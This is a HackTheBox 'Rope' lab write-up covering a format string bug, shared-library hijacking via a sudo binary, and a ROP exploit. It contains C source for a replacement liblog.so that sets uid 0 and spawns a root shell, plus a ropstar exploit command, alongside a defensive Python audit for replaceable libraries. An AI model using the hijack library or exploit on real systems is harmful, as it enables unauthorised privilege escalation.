HTB Rope Write-up

Rope is a 50-point machine on HackTheBox that involves 3 binary exploits. The box's web server has a format string vulnerability, and a binary we can run with sudo loads a shared library that we can replace. Finally, there is another binary where we have to bypass a stack canary and use ROP. My walkthrough is available on YouTube:

Notes


The user exploit.

Liblog.so:

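#include <stdio.h>
#include <stdlib.h>     /* system() */
#include <unistd.h>     /* setuid(), setgid() */
#include <sys/types.h>

/* printlog() as defined in the replacement liblog.so */
void printlog(){
    setuid(0);
    setgid(0);
    system("/bin/sh");  /* system() takes a single command string */
}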
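
The step above only works because a library loaded by a sudo-permitted binary can be replaced by an unprivileged user. The following audit for that condition is an added example, not part of the original write-up: it parses `ldd` output and flags libraries whose file or parent directories are writable by, or owned by, anyone outside a trusted set. The sample `ldd` output, its paths, and the function names are constructed for illustration.

```python
import os
import re
import stat

# One resolved dependency per line: "liblog.so => /path/liblog.so (0x...)"
LDD_LINE = re.compile(r"^\s*(\S+)\s+=>\s+(/\S+)\s+\(0x[0-9a-f]+\)\s*$")

# Constructed sample of `ldd` output; the paths are placeholders.
SAMPLE_LDD = """\
\tlinux-vdso.so.1 (0x00007ffc0d5f2000)
\tliblog.so => /opt/example/lib/liblog.so (0x00007f1c2a3e0000)
\tlibc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f1c29fe0000)
\t/lib64/ld-linux-x86-64.so.2 (0x00007f1c2a7f0000)
"""


def parse_ldd(output):
    """Return {soname: resolved path} for each dependency ldd resolved."""
    return {m.group(1): m.group(2)
            for m in map(LDD_LINE.match, output.splitlines()) if m}


def replaceable(path, trusted_uids=frozenset({0}), stop_at="/"):
    """True if a user outside trusted_uids could modify or swap `path`.

    Checks the file and each parent directory up to stop_at for an
    untrusted owner or group/world write permission.
    """
    real = os.path.realpath(path)
    stop = os.path.realpath(stop_at)
    current = real
    while True:
        st = os.stat(current)
        writable = st.st_mode & (stat.S_IWGRP | stat.S_IWOTH)
        # In a sticky directory only an entry's owner may rename or delete it.
        sticky = current != real and st.st_mode & stat.S_ISVTX
        if st.st_uid not in trusted_uids or (writable and not sticky):
            return True
        if current == stop or current == os.path.dirname(current):
            return False
        current = os.path.dirname(current)


def audit(ldd_output, **kwargs):
    """Return resolved library paths that exist and are replaceable."""
    return sorted(p for p in parse_ldd(ldd_output).values()
                  if os.path.exists(p) and replaceable(p, **kwargs))
```

Feed `audit()` the output of `ldd` for each binary listed in sudoers; any path it returns should be re-owned by root and stripped of group/world write permission.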

The root exploit.

Solving with ropstar:

python3 ~/tools/ropstar/ropstar.py -rhost localhost -rport 1337 -remote_offset ./contact

Thanks r4j for creating this fun box!
